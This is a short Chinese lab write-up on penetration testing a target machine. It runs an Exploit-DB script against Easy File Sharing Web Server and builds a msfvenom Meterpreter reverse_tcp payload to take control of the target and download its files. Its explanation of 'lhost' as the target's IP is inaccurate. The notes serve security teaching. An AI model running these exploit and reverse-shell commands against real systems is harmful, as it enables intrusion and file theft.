一、漏洞渗透测试
1、靶机安装easy file sharing web server（efssetup_2018.zip）
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞，使得靶机运行计算器。P116-119

具体实现​​​​​​

1.靶机安装efssetup

2、使用nmap扫描靶机，发现在8080端口有Easy File Sharing 服务

nmap -sV ip(扫描服务版本)

3、查找EasyFileSharing的有关漏洞

4、随机执行其中的一个漏洞脚本、就可以看到靶机已打开计算机

 python /usr/share/exploitdb/exploits/windows/remote/39009.py 172.16.91.4   8080脚本

就可以看到靶机的计算器被打开了

二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
具体实现过程：
1、生成被控端
命令：msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe
msfvenom：Metasploit程序内置的远程控制命令。
-p：指定要生成的payload，即攻击荷载。
windows：适用于Windows系统的。
meterpreter：采用meterpreter主控的。
reverse_tcp lhost：指定接收端host的ip。
lport：指定端口。
-f：指定格式为exe。
-o：指定存储payload位置，即/root/下。 

2、在kali运行被控端，获得目标计算机的控制权

3、对靶机进行操作，查看文件并且下载
Ls：查看文件
Download 文件名 ：下载文件

​​​​​​​

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！